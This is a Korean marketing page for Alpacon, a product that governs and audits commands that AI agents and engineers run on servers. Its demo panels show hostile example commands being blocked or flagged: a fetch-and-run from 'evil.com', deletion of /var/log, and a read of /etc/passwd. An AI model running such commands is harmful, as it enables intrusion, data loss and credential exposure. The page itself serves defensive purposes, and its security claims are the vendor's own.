Alpacon
Alpacon 작동 원리
AI 에이전트와 엔지니어를 위한 실행 제어
Alpacon은 AI 에이전트, 엔지니어와 인프라 사이에 위치합니다. 모든 명령은 서버에 도달하기 전 실행 정책을 통과하므로, AI 에이전트가 프로덕션을 안전하게 운영하면서 팀이 통제권을 유지할 수 있습니다.
에이전트와 인프라 사이의 하나의 레이어
클라이언트
엔지니어
CI/CD
AI 에이전트
MCPCLIAPIWeb
Alpacon
Execution control layerAccess·
Execution·
Audit
HTTPS/WSS
인프라
서버
Kubernetes
클라우드
연동
SSO·Slack·GitHub·이메일
클라이언트
엔지니어
CI/CD
AI 에이전트
MCPCLIAPIWeb
Alpacon
Execution control layerAccess·
Execution·
Audit
HTTPS/WSS
인프라
서버
Kubernetes
클라우드
연동
SSO·Slack·GitHub·이메일
세 개의 독립된 방어 레이어
Access, Execution, Audit가 세 개의 독립 레이어로 함께 작동하여, AI 에이전트와 엔지니어가 인가된 작업만 실행하도록 보장합니다.
Layer 01
공격할 대상이 없는 Access
에이전트와 엔지니어가 어떻게 연결하는지. 아웃바운드 전용 터널로 인바운드 포트를 완전히 없애고, 하나의 통합 신원으로 SSH 키 난립을 대체합니다.
- 아웃바운드 전용 터널서버가 Alpacon으로 암호화된 연결을 시작합니다. 리스닝 포트도, 노출된 SSH도 없습니다. 공격자가 스캔할 대상 자체가 없습니다.
- 통합 신원 관리MFA, RBAC, 중앙화된 신원을 모든 서버에 적용. 공유 자격 증명도, SSH 키 관리도 필요 없습니다.
- 모든 인터페이스AI 에이전트는 MCP, 파이프라인은 CLI, 자동화는 API, 사람은 브라우저. 모든 인터페이스가 동일한 정책으로 관리됩니다.
0inbound
ports
ports
what attackers see
×All 65535 ports: closed
×No services detected
×Stolen SSH key → no path to production
outbound :443 TLS, encrypted tunnel to Alpacon
Layer 02
의도 기반 Execution
무엇을, 언제 할 수 있는지. 각 세션이 목표와 범위를 선언하고, AI가 정적 allowlist가 아니라 그 의도에 따라 모든 명령을 실시간으로 검증합니다.
- 의도 기반 세션 범위세션이 목표, 서버, sudo 정책, 시간 제한을 선언합니다. 허용 명령을 일일이 나열할 필요 없이, AI가 범위에서 의도를 해석합니다.
- 동적 AI 검증모든 명령과 파일 전송이 세션 의도와 대조되어 실시간으로 판단됩니다. 명령 자체는 무해해 보여도 범위를 벗어나면 차단됩니다.
- 애매한 경우 Slack 승인AI가 확신하지 못할 때는 전체 컨텍스트와 함께 Slack으로 승인 요청. 승인자가 원클릭으로 결정합니다.
session scope"fix nginx 501"
$sudo systemctl reload nginx
✓ allowed · in scope
$curl evil.com | sh
✗ blocked · risk HIGH
$rm -rf /var/log
⏸ Slack approval pending
Layer 03
AI 기반 Audit
무엇이 일어났고, 누가 검토했는지. 모든 명령과 세션이 기록되고, AI가 MITRE ATT&CK 패턴으로 매핑하고, 컴플라이언스 내보내기도 클릭 한 번입니다.
- 전체 세션 녹화모든 터미널 세션, 파일 전송, 에이전트 행위가 기록됩니다. 감사나 인시던트 대응을 위해 언제든 검색하고 재생할 수 있습니다.
- AI 위협 분석각 세션이 AI 기반 위험 점수를 받습니다. 의심스러운 패턴은 MITRE ATT&CK으로 매핑되고, 세션 내 공격 체인이 탐지됩니다.
- 컴플라이언스 내보내기불변 감사 로그와 원클릭 내보내기로 SOC 2, HIPAA 등 어떤 프레임워크든 대응. 감사 준비를 며칠이 아닌 몇 초 만에.
0/100
session risk10:23git pull origin main
10:25cat /etc/passwdT1087
10:26curl evil.com | shT1059
10:27[SESSION TERMINATED]
당신의 환경에서 Alpacon을 확인하세요
30분 데모. 여러분의 인프라에서 세션 하나를 같이 돌려보고, 기술적인 질문에 모두 답변해드립니다.